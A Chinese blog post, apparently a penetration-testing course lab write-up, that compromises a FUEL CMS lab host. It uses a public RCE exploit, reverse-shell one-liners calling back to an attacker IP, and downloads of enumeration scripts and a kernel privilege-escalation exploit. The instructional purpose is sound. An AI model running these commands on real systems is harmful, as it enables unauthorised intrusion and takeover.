滲透測試基本技術 第三章 (003)


Posted by nathan2009729 on 2023-03-26

下一題,要先連到遠端的kali再做掃描,否則掃不到:

┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.253.19 -g 90%
Autoselecting keyboard map 'en-us' from locale
Connection established using plain RDP.

連上遠端桌面後,一樣老梗的先粗略nmap再詳細nmap:

┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.120
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 01:01 EST
Nmap scan report for 172.16.1.120
Host is up (0.046s latency).
Not shown: 65527 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 27.37 seconds

┌──(root㉿kali)-[~]
└─# nmap -p22,25,53,110,139,143,445,8081 172.16.1.120 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 01:02 EST
Nmap scan report for 172.16.1.120
Host is up (0.017s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d236aef714f27c5dba262e9b405355c5 (RSA)
|   256 1b8a0440b432f13f11c824e8cbaf771f (ECDSA)
|_  256 704228800dd468fb069c6ed304dac161 (ED25519)
25/tcp   open  smtp        Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FuleCMS
| Not valid before: 2020-08-20T16:26:53
|_Not valid after:  2030-08-18T16:26:53
|_smtp-commands: FuleCMS, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp   open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
110/tcp  open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE UIDL RESP-CODES PIPELINING TOP CAPA
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd
|_imap-capabilities: ENABLE IMAP4rev1 more capabilities have LOGINDISABLEDA0001 listed post-login SASL-IR IDLE ID OK Pre-login LOGIN-REFERRALS LITERAL+
445/tcp  open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
8081/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/fuel/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 3.16 (93%), Linux 4.4 (93%), Linux 3.10 - 3.16 (92%), Linux 3.13 (90%), Linux 3.16 - 4.6 (89%), Linux 3.2 - 4.9 (89%), Linux 4.2 (89%), Linux 3.2 - 3.8 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts:  FuleCMS, FULECMS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m02s, deviation: 4h37m07s, median: -3s
|_nbstat: NetBIOS name: FULECMS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: fulecms
|   NetBIOS computer name: FULECMS\x00
|   Domain name: \x00
|   FQDN: fulecms
|_  System time: 2023-03-12T14:03:07+08:00
| smb2-time:
|   date: 2023-03-12T06:03:06
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 25/tcp)
HOP RTT      ADDRESS
1   61.59 ms 192.168.200.1
2   10.17 ms 172.16.1.120

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.94 seconds

看到8081 port有fuel資料夾,用http://172.16.1.120:8081/fuel網址連連看:

看到稀罕cms先找找預設的帳密:

試試看:

還真的進去了:

可以看看版本號:

找找exploit-db:

看看其中一個:

從上面的網頁知道EDB-ID(50477)後,之後都可以在本機操縱,把poc複製過來後使用,成功get shell:

┌──(root㉿kali)-[~]
└─# cd /home/kali/PT_day3

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# searchsploit -m 50477
  Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
      URL: https://www.exploit-db.com/exploits/50477
     Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
    Codes: CVE-2018-16763
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/PT_day3/50477.py



┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python 50477.py -u http://172.16.1.120:8081
[+]Connecting...
Enter Command $whoami
systemwww-data

翻翻看有什麼東西:

Enter Command $ls -l
systemtotal 56
-rwxrwxr-x 1 www-data www-data  1427 Mar 31  2017 README.md
drwxrwxr-x 9 www-data www-data  4096 Mar 31  2017 assets
-rwxrwxr-x 1 www-data www-data   193 Mar 31  2017 composer.json
-rwxrwxr-x 1 www-data www-data  6502 Mar 31  2017 contributing.md
drwxrwxr-x 9 www-data www-data  4096 Mar 31  2017 fuel
-rwxrwxr-x 1 www-data www-data 11321 Aug 21  2020 index.html
-rwxrwxr-x 1 www-data www-data 11802 Mar 31  2017 index.php
-rwxrwxr-x 1 www-data www-data    20 Aug 21  2020 phpinfo.php
-rwxrwxr-x 1 www-data www-data    30 Mar 31  2017 robots.txt


Enter Command $ls ./assets -l
systemtotal 28
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 cache
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 css
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 docs
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 images
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 js
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 pdf
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 swf

發現有上傳頁面,把burp suite打開準備:

找找看本機的reverse shell腳本:

┌──(root㉿kali)-[~]
└─# cd /usr/share/webshells

┌──(root㉿kali)-[/usr/share/webshells]
└─# ls -al
total 40
drwxr-xr-x   8 root root  4096 Aug  8  2022 .
drwxr-xr-x 342 root root 12288 Feb 19 02:19 ..
drwxr-xr-x   2 root root  4096 Aug  8  2022 asp
drwxr-xr-x   2 root root  4096 Aug  8  2022 aspx
drwxr-xr-x   2 root root  4096 Aug  8  2022 cfm
drwxr-xr-x   2 root root  4096 Aug  8  2022 jsp
lrwxrwxrwx   1 root root    19 Aug  8  2022 laudanum -> /usr/share/laudanum
drwxr-xr-x   2 root root  4096 Aug  8  2022 perl
drwxr-xr-x   3 root root  4096 Dec 10 02:17 php

┌──(root㉿kali)-[/usr/share/webshells]
└─# cd php

┌──(root㉿kali)-[/usr/share/webshells/php]
└─# ls -al
total 196
drwxr-xr-x 3 root root   4096 Dec 10 02:17 .
drwxr-xr-x 8 root root   4096 Aug  8  2022 ..
drwxr-xr-x 2 root root   4096 Aug  8  2022 findsocket
-rw-r--r-- 1 root root   2800 Nov 20  2021 php-backdoor.php
-rwxr-xr-x 1 root root   5496 Dec 10 00:42 php-reverse-shell.php
-rwxr-xr-x 1 root root   5500 Dec 10 02:17 php-reverse-shell.png
-rw-r--r-- 1 root root  13585 Nov 20  2021 qsd-php-backdoor.php
-rw-r--r-- 1 root root    328 Nov 20  2021 simple-backdoor.php
-rwxrwxrwx 1 root root 147181 Dec 10 01:35 test1.jpeg

┌──(root㉿kali)-[/usr/share/webshells/php]
└─# cp php-reverse-shell.php /home/kali/PT_day3

┌──(root㉿kali)-[/usr/share/webshells/php]
└─# cd /home/kali/PT_day3

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 52
drwxr-xr-x  2 root root 4096 Mar 12 03:19 .
drwxr-xr-x 22 kali kali 4096 Mar 12 03:18 ..
-rw-r--r--  1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x  1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x  1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x  1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x  1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x  1 root root  996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x  1 root root 5496 Mar 12 03:19 php-reverse-shell.php

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim php-reverse-shell.php

改以下兩行:

改一下檔名,避免無法上傳:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv php-reverse-shell.php php-reverse-shell.jpg

試著上傳看看:

在上傳時,因為burp suite開啟了攔截,所以會顯示一些東西。

可以看到上圖2就是上傳上去的jpg,但其實是php,所以可以改成php如下圖紅圈:

改完檔名後按下burp的forward後,跳到以下畫面,找找上傳後跑到哪個位址:

但實際上找不到,因為:

只好再次使用剛剛的50477,利用它可以get shell的特性,做reverse shell:

先監聽:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nc -lvnp 1234
listening on [any] 1234 ...

打上在網頁上抄的指令:

Enter Command $php -r '$sock=fsockopen("192.168.200.6",1234);exec("sh <&3 >&3 2>&3");'
<br />
<b>Parse error</b>:  syntax error, unexpected '$sock' (T_VARIABLE) in <b>/var/www/html/fuel/modules/fuel/controllers/Pages.php(924) : runtime-created function</b> on line <b>1</b><br />

代表$符號不能用。

再換別的:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python 50477.py -u http://172.16.1.120:8081
[+]Connecting...
Enter Command $rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.200.6 1234 >/tmp/f

監聽,並成功反彈:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.6] from (UNKNOWN) [172.16.1.120] 57974
sh: 0: can't access tty; job control turned off

翻一下攻擊機,記得之前應該有下載枚舉工具linenum跟linpeas。

┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# cd /home/kali

┌──(root㉿kali)-[/home/kali]
└─# ls -al
total 972
drwxr-xr-x 22 kali kali   4096 Mar 12 03:56 .
drwxr-xr-x  4 root root   4096 Jan 15 00:59 ..
-rw-r--r--  1 kali kali    220 Aug  8  2022 .bash_logout
-rw-r--r--  1 kali kali   5551 Aug  8  2022 .bashrc
-rw-r--r--  1 kali kali   3526 Aug  8  2022 .bashrc.original
drwx------  6 kali kali   4096 Feb 19 07:36 .BurpSuite
drwxr-xr-x 10 kali kali   4096 Feb 19 04:23 .cache
drwxr-xr-x 15 kali kali   4096 Feb 27 06:51 .config
-rw-r--r--  1 kali kali   4715 Mar 11 03:16 cyberlab.ovpn
drwxr-xr-x  2 kali kali   4096 Dec 10 01:17 Desktop
-rw-r--r--  1 kali kali     35 Nov  7 06:23 .dmrc
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Documents
drwxr-xr-x  2 kali kali   4096 Mar 11 03:17 Downloads
-rw-r--r--  1 kali kali  11759 Aug  8  2022 .face
lrwxrwxrwx  1 kali kali      5 Aug  8  2022 .face.icon -> .face
drwx------  3 kali kali   4096 Nov  7 06:23 .gnupg
-rw-------  1 kali kali      0 Nov  7 06:23 .ICEauthority
drwxr-xr-x  4 kali kali   4096 Feb 19 05:32 .java
-rw-r--r--  1 root root 776167 Apr 17  2022 linpeas.sh
drwx------  3 kali kali   4096 Nov  7 06:23 .local
drwx------  5 kali kali   4096 Nov 13 02:21 .mozilla
drwxr-xr-x 10 kali kali   4096 Feb 26 07:08 .msf4
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Music
-rw-------  1 kali kali    103 Dec 10 22:12 .mysql_history
drwxr-xr-x  2 kali kali   4096 Feb 26 06:43 Pictures
-rw-r--r--  1 kali kali    807 Aug  8  2022 .profile
drwxr-xr-x  2 root root   4096 Mar 12 03:25 PT_day3
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Public
drwx------  2 kali kali   4096 Jan 15 01:42 .ssh
-rw-r--r--  1 kali kali      0 Nov 13 05:38 .sudo_as_admin_successful
drwxr-xr-x  5 kali kali   4096 Dec 31 01:50 target_machine
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Templates
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-clipboard.pid
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-display-svga-x11.pid
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-draganddrop.pid
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-seamless.pid
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-vmsvga-session-tty7.pid
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Videos
-rw-------  1 kali kali   1988 Dec 10 00:41 .viminfo
drwxr-xr-x  2 kali kali   4096 Nov 13 02:19 vulnOSv2
-rw-------  1 kali kali    249 Mar 12 03:56 .Xauthority
-rw-------  1 kali kali   8520 Mar 12 03:50 .xsession-errors
-rw-------  1 kali kali   9187 Mar 11 08:15 .xsession-errors.old
-rw-------  1 kali kali   8349 Mar 12 01:00 .zsh_history
-rw-r--r--  1 kali kali  10877 Aug  8  2022 .zshrc

┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

上面的最後一步建網頁伺服器,以便靶機下載:

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@FuleCMS:/var/www/html$ cd /
cd /
www-data@FuleCMS:/$ ls -l
ls -l
total 88
drwxr-xr-x   2 root root  4096 Aug 21  2020 bin
drwxr-xr-x   3 root root  4096 Aug 21  2020 boot
drwxr-xr-x  18 root root  4140 May 29  2021 dev
drwxr-xr-x 100 root root  4096 Aug 21  2020 etc
drwxr-xr-x   4 root root  4096 Aug 21  2020 home
lrwxrwxrwx   1 root root    32 Aug 21  2020 initrd.img -> boot/initrd.img-4.4.0-31-generic
drwxr-xr-x  22 root root  4096 Aug 21  2020 lib
drwxr-xr-x   2 root root  4096 Aug 21  2020 lib64
drwx------   2 root root 16384 Aug 21  2020 lost+found
drwxr-xr-x   4 root root  4096 Aug 21  2020 media
drwxr-xr-x   2 root root  4096 Jul 20  2016 mnt
drwxr-xr-x   2 root root  4096 Jul 20  2016 opt
dr-xr-xr-x 171 root root     0 May 29  2021 proc
drwx------   2 root root  4096 May 29  2021 root
drwxr-xr-x  27 root root   900 May 29  2021 run
drwxr-xr-x   2 root root 12288 Aug 21  2020 sbin
drwxr-xr-x   2 root root  4096 Jun 30  2016 snap
drwxr-xr-x   2 root root  4096 Jul 20  2016 srv
dr-xr-xr-x  13 root root     0 May 29  2021 sys
drwxrwxrwt   9 root root  4096 Mar 12 15:52 tmp
drwxr-xr-x  10 root root  4096 Aug 21  2020 usr
drwxr-xr-x  14 root root  4096 Aug 21  2020 var
lrwxrwxrwx   1 root root    29 Aug 21  2020 vmlinuz -> boot/vmlinuz-4.4.0-31-generic
www-data@FuleCMS:/$ cd /tmp
cd /tmp
www-data@FuleCMS:/tmp$ ls
ls
f
systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE
www-data@FuleCMS:/tmp$ wget http://192.168.200.6/linpeas.sh
wget http://192.168.200.6/linpeas.sh
--2023-03-12 16:00:53--  http://192.168.200.6/linpeas.sh
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776167 (758K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 757.98K  2.22MB/s    in 0.3s

2023-03-12 16:00:53 (2.22 MB/s) - 'linpeas.sh' saved [776167/776167]

www-data@FuleCMS:/tmp$ ls -l
ls -l
total 768
prw-r--r-- 1 www-data www-data      0 Mar 12 16:01 f
-rw-r--r-- 1 www-data www-data 776167 Apr 17  2022 linpeas.sh
drwx------ 3 root     root       4096 May 29  2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
drwx------ 3 root     root       4096 May 29  2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE
www-data@FuleCMS:/tmp$ wget http://192.168.200.6/LinEnum.sh
wget http://192.168.200.6/LinEnum.sh
--2023-03-12 16:04:52--  http://192.168.200.6/LinEnum.sh
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh          100%[===================>]  45.54K  --.-KB/s    in 0.03s

2023-03-12 16:04:52 (1.27 MB/s) - 'LinEnum.sh' saved [46631/46631]

www-data@FuleCMS:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
www-data@FuleCMS:/tmp$ chmod +x lin*
chmod +x lin*
www-data@FuleCMS:/tmp$ ls -l
ls -l
total 816
-rwxr-xr-x 1 www-data www-data  46631 Mar 12 16:03 LinEnum.sh
prw-r--r-- 1 www-data www-data      0 Mar 12 16:05 f
-rwxr-xr-x 1 www-data www-data 776167 Apr 17  2022 linpeas.sh
drwx------ 3 root     root       4096 May 29  2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
drwx------ 3 root     root       4096 May 29  2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE

找找看不用提權就可找到的文件local.txt:

www-data@FuleCMS:/tmp$ find / -name local.txt -print 2>/dev/null
find / -name local.txt -print 2>/dev/null
/home/test/local.txt
www-data@FuleCMS:/tmp$ cat /home/test/local.txt
cat /home/test/local.txt
9c5060aebbfea6f364af27dcd08393cd  -

執行linpeas.sh:(掃描結果太長所以省略)
知道內核版本號:

看看下面這個能不能用:

在本機找到poc:

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 45010
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/45010.c



┌──(kali㉿kali)-[~]
└─$ mv 45010.c cve-2017-16995.c

同樣的,讓靶機下載這個poc:

www-data@FuleCMS:/tmp$ wget http://192.168.200.6/cve-2017-16995.c
wget http://192.168.200.6/cve-2017-16995.c
--2023-03-12 16:35:54--  http://192.168.200.6/cve-2017-16995.c
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: 'cve-2017-16995.c'

cve-2017-16995.c    100%[===================>]  12.87K  --.-KB/s    in 0.03s

2023-03-12 16:35:54 (486 KB/s) - 'cve-2017-16995.c' saved [13176/13176]

www-data@FuleCMS:/tmp$ gcc cve-2017-16995.c -o cve-2017-16995
gcc cve-2017-16995.c -o cve-2017-16995
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'


nathan2009729




Related Posts

Day00 系列介紹

Day00 系列介紹

 Justin900429
MTR04_1115

MTR04_1115

 cwc329
DOM - 瀏覽器事件傳遞機制

DOM - 瀏覽器事件傳遞機制

 小小碼農

Comments